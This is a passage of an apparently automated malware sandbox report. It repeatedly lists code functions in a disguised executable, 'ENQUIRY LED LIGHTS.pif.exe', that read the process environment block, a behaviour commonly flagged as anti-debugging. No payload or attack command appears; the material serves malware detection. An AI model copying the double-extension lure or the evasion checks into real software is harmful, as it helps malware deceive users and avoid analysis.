            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F14260 mov eax, dword ptr fs:[00000030h]3_2_02F14260
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F14260 mov eax, dword ptr fs:[00000030h]3_2_02F14260
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F14260 mov eax, dword ptr fs:[00000030h]3_2_02F14260
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0826B mov eax, dword ptr fs:[00000030h]3_2_02F0826B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0A250 mov eax, dword ptr fs:[00000030h]3_2_02F0A250
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16259 mov eax, dword ptr fs:[00000030h]3_2_02F16259
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCA250 mov eax, dword ptr fs:[00000030h]3_2_02FCA250
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCA250 mov eax, dword ptr fs:[00000030h]3_2_02FCA250
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F98243 mov eax, dword ptr fs:[00000030h]3_2_02F98243
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F98243 mov ecx, dword ptr fs:[00000030h]3_2_02F98243
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0823B mov eax, dword ptr fs:[00000030h]3_2_02F0823B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E3F0 mov eax, dword ptr fs:[00000030h]3_2_02F2E3F0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E3F0 mov eax, dword ptr fs:[00000030h]3_2_02F2E3F0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E3F0 mov eax, dword ptr fs:[00000030h]3_2_02F2E3F0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F463FF mov eax, dword ptr fs:[00000030h]3_2_02F463FF
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F203E9 mov eax, dword ptr fs:[00000030h]3_2_02F203E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE3DB mov eax, dword ptr fs:[00000030h]3_2_02FBE3DB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE3DB mov eax, dword ptr fs:[00000030h]3_2_02FBE3DB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE3DB mov ecx, dword ptr fs:[00000030h]3_2_02FBE3DB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE3DB mov eax, dword ptr fs:[00000030h]3_2_02FBE3DB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB43D4 mov eax, dword ptr fs:[00000030h]3_2_02FB43D4
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB43D4 mov eax, dword ptr fs:[00000030h]3_2_02FB43D4
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCC3CD mov eax, dword ptr fs:[00000030h]3_2_02FCC3CD
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F1A3C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F1A3C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F1A3C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F1A3C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F1A3C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A3C0 mov eax, dword ptr fs:[00000030h]3_2_02F1A3C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F183C0 mov eax, dword ptr fs:[00000030h]3_2_02F183C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F183C0 mov eax, dword ptr fs:[00000030h]3_2_02F183C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F183C0 mov eax, dword ptr fs:[00000030h]3_2_02F183C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F183C0 mov eax, dword ptr fs:[00000030h]3_2_02F183C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F963C0 mov eax, dword ptr fs:[00000030h]3_2_02F963C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F08397 mov eax, dword ptr fs:[00000030h]3_2_02F08397
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F08397 mov eax, dword ptr fs:[00000030h]3_2_02F08397
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F08397 mov eax, dword ptr fs:[00000030h]3_2_02F08397
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0E388 mov eax, dword ptr fs:[00000030h]3_2_02F0E388
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0E388 mov eax, dword ptr fs:[00000030h]3_2_02F0E388
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0E388 mov eax, dword ptr fs:[00000030h]3_2_02F0E388
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3438F mov eax, dword ptr fs:[00000030h]3_2_02F3438F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3438F mov eax, dword ptr fs:[00000030h]3_2_02F3438F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB437C mov eax, dword ptr fs:[00000030h]3_2_02FB437C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9035C mov eax, dword ptr fs:[00000030h]3_2_02F9035C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9035C mov eax, dword ptr fs:[00000030h]3_2_02F9035C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9035C mov eax, dword ptr fs:[00000030h]3_2_02F9035C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9035C mov ecx, dword ptr fs:[00000030h]3_2_02F9035C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9035C mov eax, dword ptr fs:[00000030h]3_2_02F9035C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9035C mov eax, dword ptr fs:[00000030h]3_2_02F9035C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB8350 mov ecx, dword ptr fs:[00000030h]3_2_02FB8350
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDA352 mov eax, dword ptr fs:[00000030h]3_2_02FDA352
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F92349 mov eax, dword ptr fs:[00000030h]3_2_02F92349
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0C310 mov ecx, dword ptr fs:[00000030h]3_2_02F0C310
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F30310 mov ecx, dword ptr fs:[00000030h]3_2_02F30310
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A30B mov eax, dword ptr fs:[00000030h]3_2_02F4A30B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A30B mov eax, dword ptr fs:[00000030h]3_2_02F4A30B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A30B mov eax, dword ptr fs:[00000030h]3_2_02F4A30B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0C0F0 mov eax, dword ptr fs:[00000030h]3_2_02F0C0F0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F520F0 mov ecx, dword ptr fs:[00000030h]3_2_02F520F0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0A0E3 mov ecx, dword ptr fs:[00000030h]3_2_02F0A0E3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F180E9 mov eax, dword ptr fs:[00000030h]3_2_02F180E9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F960E0 mov eax, dword ptr fs:[00000030h]3_2_02F960E0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F920DE mov eax, dword ptr fs:[00000030h]3_2_02F920DE
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD60B8 mov eax, dword ptr fs:[00000030h]3_2_02FD60B8
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD60B8 mov ecx, dword ptr fs:[00000030h]3_2_02FD60B8
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA80A8 mov eax, dword ptr fs:[00000030h]3_2_02FA80A8
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1208A mov eax, dword ptr fs:[00000030h]3_2_02F1208A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3C073 mov eax, dword ptr fs:[00000030h]3_2_02F3C073
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F12050 mov eax, dword ptr fs:[00000030h]3_2_02F12050
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F96050 mov eax, dword ptr fs:[00000030h]3_2_02F96050
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA6030 mov eax, dword ptr fs:[00000030h]3_2_02FA6030
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0A020 mov eax, dword ptr fs:[00000030h]3_2_02F0A020
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0C020 mov eax, dword ptr fs:[00000030h]3_2_02F0C020
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E016 mov eax, dword ptr fs:[00000030h]3_2_02F2E016
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E016 mov eax, dword ptr fs:[00000030h]3_2_02F2E016
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E016 mov eax, dword ptr fs:[00000030h]3_2_02F2E016
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E016 mov eax, dword ptr fs:[00000030h]3_2_02F2E016
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F94000 mov ecx, dword ptr fs:[00000030h]3_2_02F94000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB2000 mov eax, dword ptr fs:[00000030h]3_2_02FB2000
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F401F8 mov eax, dword ptr fs:[00000030h]3_2_02F401F8
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FE61E5 mov eax, dword ptr fs:[00000030h]3_2_02FE61E5
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E1D0 mov eax, dword ptr fs:[00000030h]3_2_02F8E1D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E1D0 mov eax, dword ptr fs:[00000030h]3_2_02F8E1D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E1D0 mov ecx, dword ptr fs:[00000030h]3_2_02F8E1D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E1D0 mov eax, dword ptr fs:[00000030h]3_2_02F8E1D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E1D0 mov eax, dword ptr fs:[00000030h]3_2_02F8E1D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD61C3 mov eax, dword ptr fs:[00000030h]3_2_02FD61C3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD61C3 mov eax, dword ptr fs:[00000030h]3_2_02FD61C3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9019F mov eax, dword ptr fs:[00000030h]3_2_02F9019F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9019F mov eax, dword ptr fs:[00000030h]3_2_02F9019F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9019F mov eax, dword ptr fs:[00000030h]3_2_02F9019F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9019F mov eax, dword ptr fs:[00000030h]3_2_02F9019F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0A197 mov eax, dword ptr fs:[00000030h]3_2_02F0A197
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0A197 mov eax, dword ptr fs:[00000030h]3_2_02F0A197
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0A197 mov eax, dword ptr fs:[00000030h]3_2_02F0A197
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F50185 mov eax, dword ptr fs:[00000030h]3_2_02F50185
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCC188 mov eax, dword ptr fs:[00000030h]3_2_02FCC188
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FCC188 mov eax, dword ptr fs:[00000030h]3_2_02FCC188
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB4180 mov eax, dword ptr fs:[00000030h]3_2_02FB4180
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB4180 mov eax, dword ptr fs:[00000030h]3_2_02FB4180
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA8158 mov eax, dword ptr fs:[00000030h]3_2_02FA8158
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16154 mov eax, dword ptr fs:[00000030h]3_2_02F16154
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16154 mov eax, dword ptr fs:[00000030h]3_2_02F16154
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0C156 mov eax, dword ptr fs:[00000030h]3_2_02F0C156
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA4144 mov eax, dword ptr fs:[00000030h]3_2_02FA4144
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA4144 mov eax, dword ptr fs:[00000030h]3_2_02FA4144
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA4144 mov ecx, dword ptr fs:[00000030h]3_2_02FA4144
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA4144 mov eax, dword ptr fs:[00000030h]3_2_02FA4144
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA4144 mov eax, dword ptr fs:[00000030h]3_2_02FA4144
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F40124 mov eax, dword ptr fs:[00000030h]3_2_02F40124
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBA118 mov ecx, dword ptr fs:[00000030h]3_2_02FBA118
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBA118 mov eax, dword ptr fs:[00000030h]3_2_02FBA118
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBA118 mov eax, dword ptr fs:[00000030h]3_2_02FBA118
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBA118 mov eax, dword ptr fs:[00000030h]3_2_02FBA118
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD0115 mov eax, dword ptr fs:[00000030h]3_2_02FD0115
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov eax, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov ecx, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov eax, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov eax, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov ecx, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov eax, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov eax, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov ecx, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov eax, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBE10E mov ecx, dword ptr fs:[00000030h]3_2_02FBE10E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F906F1 mov eax, dword ptr fs:[00000030h]3_2_02F906F1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F906F1 mov eax, dword ptr fs:[00000030h]3_2_02F906F1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E6F2 mov eax, dword ptr fs:[00000030h]3_2_02F8E6F2
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E6F2 mov eax, dword ptr fs:[00000030h]3_2_02F8E6F2
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E6F2 mov eax, dword ptr fs:[00000030h]3_2_02F8E6F2
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E6F2 mov eax, dword ptr fs:[00000030h]3_2_02F8E6F2
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A6C7 mov ebx, dword ptr fs:[00000030h]3_2_02F4A6C7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A6C7 mov eax, dword ptr fs:[00000030h]3_2_02F4A6C7
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F466B0 mov eax, dword ptr fs:[00000030h]3_2_02F466B0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C6A6 mov eax, dword ptr fs:[00000030h]3_2_02F4C6A6
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F14690 mov eax, dword ptr fs:[00000030h]3_2_02F14690
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F14690 mov eax, dword ptr fs:[00000030h]3_2_02F14690
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F42674 mov eax, dword ptr fs:[00000030h]3_2_02F42674
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD866E mov eax, dword ptr fs:[00000030h]3_2_02FD866E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD866E mov eax, dword ptr fs:[00000030h]3_2_02FD866E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A660 mov eax, dword ptr fs:[00000030h]3_2_02F4A660
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A660 mov eax, dword ptr fs:[00000030h]3_2_02F4A660
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2C640 mov eax, dword ptr fs:[00000030h]3_2_02F2C640
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F46620 mov eax, dword ptr fs:[00000030h]3_2_02F46620
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F48620 mov eax, dword ptr fs:[00000030h]3_2_02F48620
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F2E627 mov eax, dword ptr fs:[00000030h]3_2_02F2E627
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1262C mov eax, dword ptr fs:[00000030h]3_2_02F1262C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52619 mov eax, dword ptr fs:[00000030h]3_2_02F52619
